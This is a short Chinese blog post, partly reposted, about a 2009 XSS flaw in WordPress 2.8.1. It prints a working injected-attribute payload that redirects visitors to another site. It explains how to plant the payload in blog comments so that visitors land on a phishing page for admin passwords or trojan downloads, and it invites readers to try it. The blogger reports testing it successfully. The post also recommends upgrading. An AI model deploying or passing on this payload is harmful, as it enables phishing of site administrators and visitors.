漏洞:
© / Posted in 知识如海 / July 21, 2009
得到wordpress 2.8.1 存在XSS漏洞的消息。利用该漏洞,可以制作钓鱼页面(fishing),从而骗取管理员密码,或者诱导浏览者打开存在木马的页面。漏洞的利用代码如下:
http://www.simpleseo.cn’onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,115,105,109,112,108,101,115,101,111,46,99,110);
上述代码的使用方法很简单:你到一个存在漏洞的wordpress博客留言,在URL处填写上述代码,当浏览者将鼠标移动到URL处时,就可以自动跳转到你所设计的钓鱼网页了。(有兴趣的朋友可以直接用上面的代码试试
所以说,这次wordpress 2.8.1的XSS漏洞是比较严重的。建议使用wordpress的朋友及时升级的最新的wordpress 2.8.2版本。
转自简单SEO
呵呵,找这个漏洞的代码是想拿来实验一下的~~第一次实验没成功~~后来发现是那个单引号是中文的单引号的原因,改成英文的的确成功了~~
然后试着自己对比源代码来看看能不能找到漏洞成因……对比了半天,还没啥成效的时候,在网上搜索发现,鬼仔's blog里16号就已经有文章发出来了,分析得很详细了~~呵呵~~于是,直接看看就OK了,哎~~呵呵·~
- 分页: